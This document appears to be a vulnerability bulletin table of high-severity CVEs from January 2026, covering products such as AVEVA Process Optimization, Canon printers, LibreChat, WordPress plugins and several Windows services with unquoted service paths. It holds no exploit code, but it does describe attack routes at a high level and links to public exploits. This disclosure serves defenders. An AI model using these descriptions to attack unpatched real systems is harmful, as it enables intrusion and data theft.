| Altium--Altium Live | A stored cross-site scripting (XSS) vulnerability exists in the user profile text fields of Altium 365. Insufficient server-side input sanitization allows authenticated users to inject arbitrary HTML and JavaScript payloads using whitespace-based attribute parsing bypass techniques. The injected payload is persisted and executed when other users view the affected profile page, potentially allowing session token theft, phishing attacks, or malicious redirects. Exploitation requires an authenticated account and user interaction to view the crafted profile. | 2026-01-15 | 7.6 | CVE-2026-1008 | https://www.altium.com/platform/security-compliance/security-advisories |
| Ametys--Ametys CMS | Ametys CMS v4.4.1 contains a persistent cross-site scripting vulnerability in the link directory's input fields for external links. Attackers can inject malicious script code in link text and descriptions to execute persistent attacks that compromise user sessions and manipulate application modules. | 2026-01-13 | 7.2 | CVE-2022-50937 | ExploitDB-50692 Vulnerability Lab Advisory Official Ametys CMS Homepage VulnCheck Advisory: Ametys CMS v4.4.1 - Cross Site Scripting (XSS) |
| amitmerchant1990--Markdownify | Markdownify 1.2.0 contains a persistent cross-site scripting vulnerability that allows attackers to store malicious payloads within markdown files. Attackers can upload crafted markdown files with embedded scripts that execute when the file is opened, potentially enabling remote code execution. | 2026-01-16 | 7.2 | CVE-2021-47837 | ExploitDB-49835 Markdownify GitHub Repository Proof of Concept Video VulnCheck Advisory: Markdownify 1.2.0 - Persistent Cross-Site Scripting |
| anomalyco--opencode | OpenCode is an open source AI coding agent. Prior to 1.0.216, OpenCode automatically starts an unauthenticated HTTP server that allows any local process (or any website via permissive CORS) to execute arbitrary shell commands with the user's privileges. This vulnerability is fixed in 1.0.216. | 2026-01-12 | 8.8 | CVE-2026-22812 | https://github.com/anomalyco/opencode/security/advisories/GHSA-vxw4-wv6m-9hhh |
| appsmithorg--appsmith | Appsmith is a platform to build admin panels, internal tools, and dashboards. Prior to 1.93, the server uses the Origin value from the request headers as the email link baseUrl without validation. If an attacker controls the Origin, password reset / email verification links in emails can be generated pointing to the attacker's domain, causing authentication tokens to be exposed and potentially leading to account takeover. This vulnerability is fixed in 1.93. | 2026-01-12 | 9.7 | CVE-2026-22794 | https://github.com/appsmithorg/appsmith/security/advisories/GHSA-7hf5-mc28-xmcv https://github.com/appsmithorg/appsmith/commit/6f9ee6226bac13fb4b836940b557913fff78b633 |
| AVEVA--Process Optimization | The vulnerability, if exploited, could allow an unauthenticated miscreant to achieve remote code execution under OS system privileges of "taoimr" service, potentially resulting in complete compromise of the model application server. | 2026-01-16 | 10 | CVE-2025-61937 | https://www.aveva.com/en/support-and-success/cyber-security-updates/ https://softwaresupportsp.aveva.com/en-US/downloads/products/details/a643eaa3-0d85-4fde-ac11-5239e87a68ea https://www.cisa.gov/news-events/ics-advisories/icsa-26-015-01 https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-015-01.json |
| AVEVA--Process Optimization | The vulnerability, if exploited, could allow an authenticated miscreant (Process Optimization Standard User) to tamper with queries in Captive Historian and achieve code execution under SQL Server administrative privileges, potentially resulting in complete compromise of the SQL Server. | 2026-01-16 | 8.4 | CVE-2025-61943 | https://www.aveva.com/en/support-and-success/cyber-security-updates/ https://softwaresupportsp.aveva.com/en-US/downloads/products/details/a643eaa3-0d85-4fde-ac11-5239e87a68ea https://www.cisa.gov/news-events/ics-advisories/icsa-26-015-01 https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-015-01.json |
| AVEVA--Process Optimization | The vulnerability, if exploited, could allow an authenticated miscreant (OS standard user) to tamper with TCL Macro scripts and escalate privileges to OS system, potentially resulting in complete compromise of the model application server. | 2026-01-16 | 8.8 | CVE-2025-64691 | https://www.aveva.com/en/support-and-success/cyber-security-updates/ https://softwaresupportsp.aveva.com/en-US/downloads/products/details/a643eaa3-0d85-4fde-ac11-5239e87a68ea https://www.cisa.gov/news-events/ics-advisories/icsa-26-015-01 https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-015-01.json |
| AVEVA--Process Optimization | The vulnerability, if exploited, could allow an authenticated miscreant (OS Standard User) to tamper with Process Optimization project files, embed code, and escalate their privileges to the identity of a victim user who subsequently interacts with the project files. | 2026-01-16 | 8.1 | CVE-2025-64729 | https://www.aveva.com/en/support-and-success/cyber-security-updates/ https://softwaresupportsp.aveva.com/en-US/downloads/products/details/a643eaa3-0d85-4fde-ac11-5239e87a68ea https://www.cisa.gov/news-events/ics-advisories/icsa-26-015-01 https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-015-01.json |
| AVEVA--Process Optimization | The vulnerability, if exploited, could allow an authenticated miscreant (OS Standard User) to trick Process Optimization services into loading arbitrary code and escalate privileges to OS System, potentially resulting in complete compromise of the Model Application Server. | 2026-01-16 | 8.8 | CVE-2025-65118 | https://www.aveva.com/en/support-and-success/cyber-security-updates/ https://softwaresupportsp.aveva.com/en-US/downloads/products/details/a643eaa3-0d85-4fde-ac11-5239e87a68ea https://www.cisa.gov/news-events/ics-advisories/icsa-26-015-01 https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-015-01.json |
| AVEVA--Process Optimization | The Process Optimization application suite uses connection channels/protocols that are not encrypted by default and could be subject to hijacking or data leakage in man-in-the-middle or passive inspection scenarios. | 2026-01-16 | 7.1 | CVE-2025-64769 | https://www.aveva.com/en/support-and-success/cyber-security-updates/ https://softwaresupportsp.aveva.com/en-US/downloads/products/details/a643eaa3-0d85-4fde-ac11-5239e87a68ea https://www.cisa.gov/news-events/ics-advisories/icsa-26-015-01 https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-015-01.json |
| AVEVA--Process Optimization | The vulnerability, if exploited, could allow an authenticated miscreant (Process Optimization Designer User) to embed OLE objects into graphics, and escalate their privileges to the identity of a victim user who subsequently interacts with the graphical elements. | 2026-01-16 | 7.4 | CVE-2025-65117 | https://www.aveva.com/en/support-and-success/cyber-security-updates/ https://softwaresupportsp.aveva.com/en-US/downloads/products/details/a643eaa3-0d85-4fde-ac11-5239e87a68ea https://www.cisa.gov/news-events/ics-advisories/icsa-26-015-01 https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-015-01.json |
| Bdtask--Isshue Shopping Cart | Isshue Shopping Cart 3.5 contains a persistent cross-site scripting vulnerability in title input fields across stock, customer, and invoice modules. Attackers with privileged user accounts can inject malicious scripts that execute on preview, potentially enabling session hijacking and persistent phishing attacks. | 2026-01-15 | 7.2 | CVE-2021-47769 | ExploitDB-50490 Vulnerability-Lab Disclosure Official Product Homepage |
| Beehive Forum--Beehive Forum | Beehive Forum 1.5.2 contains a host header injection vulnerability in the forgot password functionality that allows attackers to manipulate password reset requests. Attackers can inject a malicious host header to intercept password reset tokens and change victim account passwords without direct authentication. | 2026-01-13 | 7.5 | CVE-2022-50910 | ExploitDB-50923 Beehive Forum Official Website Beehive Forum SourceForge Project Proof of Concept Imgur VulnCheck Advisory: Beehive Forum - Account Takeover |
| Brother--Brother BRAgent | Brother BRAgent 1.38 contains an unquoted service path vulnerability in the WBA_Agent_Client service running with LocalSystem privileges. Attackers can exploit the unquoted path in C:\Program Files (x86)\Brother\BRAgent\ to inject and execute malicious code with elevated system permissions. | 2026-01-15 | 7.8 | CVE-2020-36928 | ExploitDB-50010 BRAgent Webpage VulnCheck Advisory: Brother BRAgent 1.38 - 'WBA_Agent_Client' Unquoted Service Path |
| Canon Inc.--Satera LBP670C Series | Buffer overflow in print job processing by WSD on Small Office Multifunction Printers and Laser Printers (*) which may allow an attacker on the same network segment to render the affected product unresponsive or to execute arbitrary code. *: Satera LBP670C Series/Satera MF750C Series firmware v06.02 and earlier sold in Japan. Color imageCLASS LBP630C/Color imageCLASS MF650C Series/imageCLASS LBP230 Series/imageCLASS X LBP1238 II/imageCLASS MF450 Series/imageCLASS X MF1238 II/imageCLASS X MF1643i II/imageCLASS X MF1643iF II firmware v06.02 and earlier sold in the US. i-SENSYS LBP630C Series/i-SENSYS MF650C Series/i-SENSYS LBP230 Series/1238P II/1238Pr II/i-SENSYS MF450 Series/i-SENSYS MF550 Series/1238i II/1238iF II/imageRUNNER 1643i II/imageRUNNER 1643iF II firmware v06.02 and earlier sold in Europe. | 2026-01-15 | 9.8 | CVE-2025-14231 | https://psirt.canon/advisory-information/cp2026-001/ https://canon.jp/support/support-info/260115vulnerability-response https://www.usa.canon.com/support/canon-product-advisories/Service-Notice-Regarding-Remediation-Measure-Against-Potential-Buffer-Overflow-Vulnerability-in-Laser-Printers-and-Small-Office-Multifunctional-Printers https://www.canon-europe.com/support/product-security/ |
| Canon Inc.--Satera LBP670C Series | Buffer overflow in XML processing of XPS files in Small Office Multifunction Printers and Laser Printers (*) which may allow an attacker on the same network segment to render the affected product unresponsive or to execute arbitrary code. *: Satera LBP670C Series/Satera MF750C Series firmware v06.02 and earlier sold in Japan. Color imageCLASS LBP630C/Color imageCLASS MF650C Series/imageCLASS LBP230 Series/imageCLASS X LBP1238 II/imageCLASS MF450 Series/imageCLASS X MF1238 II/imageCLASS X MF1643i II/imageCLASS X MF1643iF II firmware v06.02 and earlier sold in the US. i-SENSYS LBP630C Series/i-SENSYS MF650C Series/i-SENSYS LBP230 Series/1238P II/1238Pr II/i-SENSYS MF450 Series/i-SENSYS MF550 Series/1238i II/1238iF II/imageRUNNER 1643i II/imageRUNNER 1643iF II firmware v06.02 and earlier sold in Europe. | 2026-01-15 | 9.8 | CVE-2025-14232 | https://psirt.canon/advisory-information/cp2026-001/ https://canon.jp/support/support-info/260115vulnerability-response https://www.usa.canon.com/support/canon-product-advisories/Service-Notice-Regarding-Remediation-Measure-Against-Potential-Buffer-Overflow-Vulnerability-in-Laser-Printers-and-Small-Office-Multifunctional-Printers https://www.canon-europe.com/support/product-security/ |
| Canon Inc.--Satera LBP670C Series | Invalid free in CPCA file deletion processing on Small Office Multifunction Printers and Laser Printers (*) which may allow an attacker on the same network segment to render the affected product unresponsive or to execute arbitrary code. *: Satera LBP670C Series/Satera MF750C Series firmware v06.02 and earlier sold in Japan. Color imageCLASS LBP630C/Color imageCLASS MF650C Series/imageCLASS LBP230 Series/imageCLASS X LBP1238 II/imageCLASS MF450 Series/imageCLASS X MF1238 II/imageCLASS X MF1643i II/imageCLASS X MF1643iF II firmware v06.02 and earlier sold in the US. i-SENSYS LBP630C Series/i-SENSYS MF650C Series/i-SENSYS LBP230 Series/1238P II/1238Pr II/i-SENSYS MF450 Series/i-SENSYS MF550 Series/1238i II/1238iF II/imageRUNNER 1643i II/imageRUNNER 1643iF II firmware v06.02 and earlier sold in Europe. | 2026-01-15 | 9.8 | CVE-2025-14233 | https://psirt.canon/advisory-information/cp2026-001/ https://canon.jp/support/support-info/260115vulnerability-response https://www.usa.canon.com/support/canon-product-advisories/Service-Notice-Regarding-Remediation-Measure-Against-Potential-Buffer-Overflow-Vulnerability-in-Laser-Printers-and-Small-Office-Multifunctional-Printers https://www.canon-europe.com/support/product-security/ |
| Canon Inc.--Satera LBP670C Series | Buffer overflow in CPCA list processing on Small Office Multifunction Printers and Laser Printers (*) which may allow an attacker on the same network segment to render the affected product unresponsive or to execute arbitrary code. *: Satera LBP670C Series/Satera MF750C Series firmware v06.02 and earlier sold in Japan. Color imageCLASS LBP630C/Color imageCLASS MF650C Series/imageCLASS LBP230 Series/imageCLASS X LBP1238 II/imageCLASS MF450 Series/imageCLASS X MF1238 II/imageCLASS X MF1643i II/imageCLASS X MF1643iF II firmware v06.02 and earlier sold in the US. i-SENSYS LBP630C Series/i-SENSYS MF650C Series/i-SENSYS LBP230 Series/1238P II/1238Pr II/i-SENSYS MF450 Series/i-SENSYS MF550 Series/1238i II/1238iF II/imageRUNNER 1643i II/imageRUNNER 1643iF II firmware v06.02 and earlier sold in Europe. | 2026-01-15 | 9.8 | CVE-2025-14234 | https://psirt.canon/advisory-information/cp2026-001/ https://canon.jp/support/support-info/260115vulnerability-response https://www.usa.canon.com/support/canon-product-advisories/Service-Notice-Regarding-Remediation-Measure-Against-Potential-Buffer-Overflow-Vulnerability-in-Laser-Printers-and-Small-Office-Multifunctional-Printers https://www.canon-europe.com/support/product-security/ |
| Canon Inc.--Satera LBP670C Series | Buffer overflow in XPS font fpgm data processing on Small Office Multifunction Printers and Laser Printers (*) which may allow an attacker on the same network segment to render the affected product unresponsive or to execute arbitrary code. *: Satera LBP670C Series/Satera MF750C Series firmware v06.02 and earlier sold in Japan. Color imageCLASS LBP630C/Color imageCLASS MF650C Series/imageCLASS LBP230 Series/imageCLASS X LBP1238 II/imageCLASS MF450 Series/imageCLASS X MF1238 II/imageCLASS X MF1643i II/imageCLASS X MF1643iF II firmware v06.02 and earlier sold in the US. i-SENSYS LBP630C Series/i-SENSYS MF650C Series/i-SENSYS LBP230 Series/1238P II/1238Pr II/i-SENSYS MF450 Series/i-SENSYS MF550 Series/1238i II/1238iF II/imageRUNNER 1643i II/imageRUNNER 1643iF II firmware v06.02 and earlier sold in Europe. | 2026-01-15 | 9.8 | CVE-2025-14235 | https://psirt.canon/advisory-information/cp2026-001/ https://canon.jp/support/support-info/260115vulnerability-response https://www.usa.canon.com/support/canon-product-advisories/Service-Notice-Regarding-Remediation-Measure-Against-Potential-Buffer-Overflow-Vulnerability-in-Laser-Printers-and-Small-Office-Multifunctional-Printers https://www.canon-europe.com/support/product-security/ |
| Canon Inc.--Satera LBP670C Series | Buffer overflow in Address Book attribute tag processing on Small Office Multifunction Printers (*) which may allow an attacker on the same network segment to render the affected product unresponsive or to execute arbitrary code. *: Satera LBP670C Series/Satera MF750C Series firmware v06.02 and earlier sold in Japan. Color imageCLASS LBP630C/Color imageCLASS MF650C Series/imageCLASS LBP230 Series/imageCLASS X LBP1238 II/imageCLASS MF450 Series/imageCLASS X MF1238 II/imageCLASS X MF1643i II/imageCLASS X MF1643iF II firmware v06.02 and earlier sold in the US. i-SENSYS LBP630C Series/i-SENSYS MF650C Series/i-SENSYS LBP230 Series/1238P II/1238Pr II/i-SENSYS MF450 Series/i-SENSYS MF550 Series/1238i II/1238iF II/imageRUNNER 1643i II/imageRUNNER 1643iF II firmware v06.02 and earlier sold in Europe. | 2026-01-15 | 9.8 | CVE-2025-14236 | https://psirt.canon/advisory-information/cp2026-001/ https://canon.jp/support/support-info/260115vulnerability-response https://www.usa.canon.com/support/canon-product-advisories/Service-Notice-Regarding-Remediation-Measure-Against-Potential-Buffer-Overflow-Vulnerability-in-Laser-Printers-and-Small-Office-Multifunctional-Printers https://www.canon-europe.com/support/product-security/ |
| Canon Inc.--Satera LBP670C Series | Buffer overflow in XPS font parse processing on Small Office Multifunction Printers and Laser Printers (*) which may allow an attacker on the same network segment to render the affected product unresponsive or to execute arbitrary code. *: Satera LBP670C Series/Satera MF750C Series firmware v06.02 and earlier sold in Japan. Color imageCLASS LBP630C/Color imageCLASS MF650C Series/imageCLASS LBP230 Series/imageCLASS X LBP1238 II/imageCLASS MF450 Series/imageCLASS X MF1238 II/imageCLASS X MF1643i II/imageCLASS X MF1643iF II firmware v06.02 and earlier sold in the US. i-SENSYS LBP630C Series/i-SENSYS MF650C Series/i-SENSYS LBP230 Series/1238P II/1238Pr II/i-SENSYS MF450 Series/i-SENSYS MF550 Series/1238i II/1238iF II/imageRUNNER 1643i II/imageRUNNER 1643iF II firmware v06.02 and earlier sold in Europe. | 2026-01-15 | 9.8 | CVE-2025-14237 | https://psirt.canon/advisory-information/cp2026-001/ https://canon.jp/support/support-info/260115vulnerability-response https://www.usa.canon.com/support/canon-product-advisories/Service-Notice-Regarding-Remediation-Measure-Against-Potential-Buffer-Overflow-Vulnerability-in-Laser-Printers-and-Small-Office-Multifunctional-Printers https://www.canon-europe.com/support/product-security/ |
| checkpoint--Harmony SASE | A local user can trigger the Harmony SASE Windows client to write or delete files outside the intended certificate working directory. | 2026-01-14 | 7.5 | CVE-2025-9142 | https://support.checkpoint.com/results/sk/sk184557 |
| clevo--HotKey Clipboard | Clevo HotKey Clipboard 2.1.0.6 contains an unquoted service path vulnerability in the HKClipSvc service that allows local non-privileged users to potentially execute code with system privileges. Attackers can exploit the misconfigured service path to inject and execute arbitrary code by placing malicious executables in specific file system locations. | 2026-01-13 | 8.4 | CVE-2023-53984 | ExploitDB-51206 Archived Vendor Homepage VulnCheck Advisory: HotKey Clipboard 2.1.0.6 - Privilege Escalation Unquoted Service Path |
| Cmder--Cmder Console Emulator | Cmder Console Emulator 1.3.18 contains a buffer overflow vulnerability that allows attackers to trigger a denial of service condition through a maliciously crafted .cmd file. Attackers can create a specially constructed .cmd file with repeated characters to overwhelm the console emulator's buffer and crash the application. | 2026-01-15 | 9.8 | CVE-2021-47781 | ExploitDB-50401 Cmder GitHub Repository |
| Cobbr--Covenant | Covenant 0.1.3 - 0.5 contains a remote code execution vulnerability that allows attackers to craft malicious JWT tokens with administrative privileges. Attackers can generate forged tokens with admin roles and upload custom DLL payloads to execute arbitrary commands on the target system. | 2026-01-13 | 9.8 | CVE-2020-36911 | ExploitDB-51141 Vendor Homepage Covenant GitHub Repository Archived Researcher Blog Exploit Repository Archived Maintainer Patch Announcement VulnCheck Advisory: Covenant 0.5 - Remote Code Execution (RCE) |
| Cobiansoft--Cobian Backup | Cobian Backup 0.9 contains an unquoted service path vulnerability that allows local users to execute arbitrary code with elevated system privileges. Attackers can exploit the unquoted binary path in the CobianReflectorService to inject malicious code that will execute with LocalSystem permissions during service startup. | 2026-01-13 | 8.4 | CVE-2022-50923 | ExploitDB-50810 Vendor Homepage Software Download Page VulnCheck Advisory: Cobian Backup 0.9 - Unquoted Service Path |
| code-projects--Online Music Site | An SQL injection flaw has been discovered in code-projects Online Music Site 1.0 in the file /Administrator/PHP/AdminUpdateUser.php. Manipulation of the ID argument results in SQL injection. The attack can be executed remotely, and a public exploit is available. | 2026-01-12 | 7.3 | CVE-2026-0852 | VDB-340447 \| code-projects Online Music Site AdminUpdateUser.php sql injection VDB-340447 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #734136 \| code-projects ONLINE MUSIC SITE V1.0 SQL injection https://github.com/Learner636/CVE-smbmit/issues/2 https://code-projects.org/ |
| Connectify Inc--Connectify Hotspot | Connectify Hotspot 2018 contains an unquoted service path vulnerability in its ConnectifyService executable that allows local attackers to potentially execute arbitrary code. Attackers can exploit the unquoted path in 'C:\Program Files (x86)\Connectify\ConnectifyService.exe' to inject malicious executables and escalate privileges. | 2026-01-13 | 8.4 | CVE-2022-50929 | ExploitDB-50764 Official Vendor Homepage VulnCheck Advisory: Connectify Hotspot 2018 'ConnectifyService' - Unquoted Service Path |
| ConnectWise--PSA | In ConnectWise PSA versions older than 2026.1, Time Entry notes stored in the Time Entry Audit Trail may be rendered without applying output encoding to certain content. Under specific conditions, this may allow stored script code to execute in the context of a user's browser when the affected content is displayed. | 2026-01-16 | 8.7 | CVE-2026-0695 | https://www.connectwise.com/company/trust/security-bulletins/2026-01-15-psa-security-fix |
| Contpaqi--CONTPAQ AdminPAQ | CONTPAQi AdminPAQ 14.0.0 contains an unquoted service path vulnerability in the AppKeyLicenseServer service running with LocalSystem privileges. Attackers can exploit the unquoted path to inject malicious code in the service binary path, potentially executing arbitrary code with elevated system privileges during service startup. | 2026-01-13 | 8.4 | CVE-2022-50938 | ExploitDB-50690 CONTPAQi Official Software Download Page VulnCheck Advisory: CONTPAQi® AdminPAQ 14.0.0 - Unquoted Service Path |
| Cooler Master Technology Inc.--Cooler Master MasterPlus | CoolerMaster MasterPlus 1.8.5 contains an unquoted service path vulnerability in the MPService that allows local attackers to execute code with elevated system privileges. Attackers can drop a malicious executable in the service path and trigger code execution during service startup or system reboot. | 2026-01-13 | 8.4 | CVE-2022-50808 | ExploitDB-51159 CoolerMaster MasterPlus Official Homepage VulnCheck Advisory: CoolerMaster MasterPlus 1.8.5 - 'MPService' Unquoted Service Path |
| cotonti.com--Cotonti Siena | Cotonti Siena 0.9.19 contains a stored cross-site scripting vulnerability in the admin configuration panel's site title parameter. Attackers can inject malicious JavaScript code through the 'maintitle' parameter to execute scripts when administrators view the page. | 2026-01-15 | 7.2 | CVE-2021-47808 | ExploitDB-50016 Vendor Homepage Software Download VulnCheck Advisory: Cotonti Siena 0.9.19 - 'maintitle' Stored Cross-Site Scripting |
| croixhaug--Appointment Booking Calendar Simply Schedule Appointments Booking Plugin | The Appointment Booking Calendar - Simply Schedule Appointments Booking Plugin plugin for WordPress is vulnerable to blind SQL Injection via the `order` and `append_where_sql` parameters in all versions up to, and including, 1.6.9.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2026-01-14 | 7.5 | CVE-2025-12166 | https://www.wordfence.com/threat-intel/vulnerabilities/id/5214a399-21a4-4573-9840-1d5043781bc0?source=cve https://plugins.trac.wordpress.org/changeset/3408539/ |
| Cyberfox--Cyberfox Web Browser | Cyberfox Web Browser 52.9.1 contains a denial of service vulnerability that allows attackers to crash the application by overflowing the search bar with excessive data. Attackers can generate a 9,000,000 byte payload and paste it into the search bar to trigger an application crash. | 2026-01-15 | 7.5 | CVE-2021-47784 | ExploitDB-50336 Archived Cyberfox Web Browser Homepage |
| D-Link--DIR-823X | A command injection flaw has been identified in D-Link DIR-823X firmware 250416 in the function sub_412E7C of the file /goform/set_wifidog_settings. Manipulation of the wd_enable argument leads to command injection. The attack can be executed remotely, and a public exploit is available. | 2026-01-18 | 7.3 | CVE-2026-1125 | VDB-341717 \| D-Link DIR-823X set_wifidog_settings sub_412E7C command injection VDB-341717 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #734966 \| D-Link DIR-823X Router V250416 Command Execution https://github.com/DavCloudz/cve/blob/main/D-link/DIR_823X/DIR-823X%20V250416%20Command%20Execution%20Vulnerability.md https://www.dlink.com/ |
| danny-avila--LibreChat | LibreChat is a ChatGPT clone with additional features. Prior to v0.8.2-rc2, LibreChat's MCP stdio transport accepts arbitrary commands without validation, allowing any authenticated user to execute shell commands as root inside the container through a single API request. This vulnerability is fixed in v0.8.2-rc2. | 2026-01-12 | 9.1 | CVE-2026-22252 | https://github.com/danny-avila/LibreChat/security/advisories/GHSA-cxhj-j78r-p88f https://github.com/danny-avila/LibreChat/commit/211b39f3113d4e6ecab84be0a83f4e9c9dea127f |
| daschmi--GetContentFromURL | The GetContentFromURL plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 1.0. This is due to the plugin using wp_remote_get() instead of wp_safe_remote_get() to fetch content from a user-supplied URL in the 'url' parameter of the [gcfu] shortcode. This makes it possible for authenticated attackers, with Contributor-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services. | 2026-01-14 | 7.2 | CVE-2025-14613 | https://www.wordfence.com/threat-intel/vulnerabilities/id/b83db6c7-09af-4707-a96b-ee551f27e3b7?source=cve https://plugins.trac.wordpress.org/browser/getcontentfromurl/trunk/classes/shortcode.class.php#L20 https://plugins.trac.wordpress.org/browser/getcontentfromurl/tags/1.0/classes/shortcode.class.php#L20 |
| dashboardbuilder--DASHBOARD BUILDER WordPress plugin for Charts and Graphs | The DASHBOARD BUILDER - WordPress plugin for Charts and Graphs plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.5.7. This is due to missing nonce validation on the settings handler in dashboardbuilder-admin.php. This makes it possible for unauthenticated attackers to modify the stored SQL query and database credentials used by the [show-dashboardbuilder] shortcode via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. The modified SQL query is subsequently executed on the front-end when the shortcode is rendered, enabling arbitrary SQL injection and data exfiltration through the publicly visible chart output. | 2026-01-14 | 7.1 | CVE-2025-14615 | https://www.wordfence.com/threat-intel/vulnerabilities/id/106b31ed-d509-4551-a134-02193ab22fe1?source=cve https://plugins.trac.wordpress.org/browser/dashboard-builder/trunk/dashboardbuilder-admin.php#L158 https://plugins.trac.wordpress.org/browser/dashboard-builder/tags/1.5.7/dashboardbuilder-admin.php#L158 https://plugins.trac.wordpress.org/browser/dashboard-builder/trunk/dashboardbuilder.php#L51 https://plugins.trac.wordpress.org/browser/dashboard-builder/tags/1.5.7/dashboardbuilder.php#L51 |
| Dell--SupportAssist OS Recovery | Dell SupportAssist OS Recovery, versions prior to 5.5.15.1, contain a Creation of Temporary File With Insecure Permissions vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to Elevation of privileges. | 2026-01-13 | 7.5 | CVE-2025-46685 | https://www.dell.com/support/kbdoc/en-us/000401506/dsa-2025-456 |
| Delta Electronics--DIAView | Delta Electronics DIAView has multiple vulnerabilities. | 2026-01-16 | 9.8 | CVE-2025-62581 | https://filecenter.deltaww.com/news/download/doc/Delta-PCSA-2026-00001_DIAView%20Multiple%20Vulnerabilities%20(CVE-2025-62581,%20CVE-2025-62582).pdf |
| Delta Electronics--DIAView | Delta Electronics DIAView has multiple vulnerabilities. | 2026-01-16 | 9.8 | CVE-2025-62582 | https://filecenter.deltaww.com/news/download/doc/Delta-PCSA-2026-00001_DIAView%20Multiple%20Vulnerabilities%20(CVE-2025-62581,%20CVE-2025-62582).pdf |
| Delta Electronics--DIAView | Delta Electronics DIAView has Command Injection vulnerability. | 2026-01-16 | 7.8 | CVE-2026-0975 | https://filecenter.deltaww.com/news/download/doc/Delta-PCSA-2026-00002_DIAView%20-Exposed%20Dangerous%20Method%20Remote%20Code%20Execution%20(CVE-2026-0975).pdf |
| denoland--deno | Deno is a JavaScript, TypeScript, and WebAssembly runtime. Before 2.5.6, a prior patch aimed to block spawning Windows batch/shell files by returning an error when a spawned path's extension matched .bat or .cmd. That check performs a case-sensitive comparison against lowercase literals and therefore can be bypassed when the extension uses alternate casing (for example .BAT, .Bat, etc.). This vulnerability is fixed in 2.5.6. | 2026-01-15 | 8.1 | CVE-2026-22864 | https://github.com/denoland/deno/security/advisories/GHSA-m3c4-prhw-mrx6 https://github.com/denoland/deno/releases/tag/v2.5.6 |
| Denver--Smart Wifi Camera | Denver SHC-150 Smart Wifi Camera contains a hardcoded telnet credential vulnerability that allows unauthenticated attackers to access a Linux shell. Attackers can connect to port 23 using the default credential to execute arbitrary commands on the camera's operating system. | 2026-01-15 | 9.8 | CVE-2021-47796 | ExploitDB-50160 Official Product Homepage VulnCheck Advisory: Denver Smart Wifi Camera SHC-150 - 'Telnet' Remote Code Execution (RCE) |
| dfir-iris--iris-web | Iris is a web collaborative platform that helps incident responders share technical details during investigations. Prior to 2.4.24, the DFIR-IRIS datastore file management system has a vulnerability where mass assignment of the file_local_name field combined with path trust in the delete operation enables authenticated users to delete arbitrary filesystem paths. The vulnerability manifests through a three-step attack chain: authenticated users upload a file to the datastore, update the file's file_local_name field to point to an arbitrary filesystem path through mass assignment, then trigger the delete operation which removes the target file without path validation. This vulnerability is fixed in 2.4.24. | 2026-01-12 | 9.6 | CVE-2026-22783 | https://github.com/dfir-iris/iris-web/security/advisories/GHSA-qhqj-8qw6-wp8v https://github.com/dfir-iris/iris-web/commit/57c1b80494bac187893aebc6d9df1ce6e56485b7 |
| dharashah--Chikitsa Patient Management System | Chikitsa Patient Management System 2.0.2 contains an authenticated remote code execution vulnerability in the backup restoration functionality. Authenticated attackers can upload a modified backup zip file with a malicious PHP shell to execute arbitrary system commands on the server. | 2026-01-15 | 8.8 | CVE-2021-47757 | ExploitDB-50572 Product Webpage Product GitHub Repository Product Sourceforge Page |
| dharashah--Chikitsa Patient Management System | Chikitsa Patient Management System 2.0.2 contains an authenticated remote code execution vulnerability that allows attackers to upload malicious PHP plugins through the module upload functionality. Authenticated attackers can generate and upload a ZIP plugin with a PHP backdoor that enables arbitrary command execution on the server through a weaponized PHP script. | 2026-01-15 | 8.8 | CVE-2021-47758 | ExploitDB-50571 Product Webpage Product GitHub Repository Product Sourceforge Page |
| Diskboss--DiskBoss Service | DiskBoss Service 12.2.18 contains an unquoted service path vulnerability in its binary path configuration that allows local attackers to execute code with elevated privileges. Attackers can exploit the unquoted path by placing malicious executables in potential path locations to gain system-level access during service startup. | 2026-01-16 | 7.8 | CVE-2021-47822 | ExploitDB-49899 Official Vendor Homepage VulnCheck Advisory: DiskBoss Service 12.2.18 - 'diskbsa.exe' Unquoted Service Path |
| Diskpulse--DiskPulse | DiskPulse Enterprise 13.6.14 contains an unquoted service path vulnerability in its Windows service configuration that allows local attackers to potentially execute arbitrary code. Attackers can exploit the unquoted path in 'C:\Program Files\Disk Pulse Enterprise\bin\diskpls.exe' to inject malicious executables and escalate privileges. | 2026-01-15 | 7.8 | CVE-2020-36927 | ExploitDB-50012 Vendor Homepage VulnCheck Advisory: DiskPulse 13.6.14 - Unquoted Service Path |
| Disksavvy--Disk Savvy | Disk Savvy 13.6.14 contains an unquoted service path vulnerability in its Windows service configuration that allows local attackers to potentially execute arbitrary code. Attackers can exploit the unquoted path in service binaries to inject malicious executables that will be run with elevated LocalSystem privileges. | 2026-01-15 | 7.8 | CVE-2021-47805 | ExploitDB-50024 Vendor Homepage VulnCheck Advisory: Disk Savvy 13.6.14 - 'Multiple' Unquoted Service Path |
| Disksorter--Disk Sorter Enterprise | Disk Sorter Enterprise 13.6.12 contains an unquoted service path vulnerability in its Windows service configuration that allows local attackers to potentially execute arbitrary code. Attackers can exploit the unquoted path in 'C:\Program Files\Disk Sorter Enterprise\bin\disksrs.exe' to inject malicious executables and escalate privileges. | 2026-01-15 | 7.8 | CVE-2021-47809 | ExploitDB-50014 Vendor Homepage VulnCheck Advisory: Disk Sorter Enterprise 13.6.12 - 'Disk Sorter Enterprise' Unquoted Service Path |
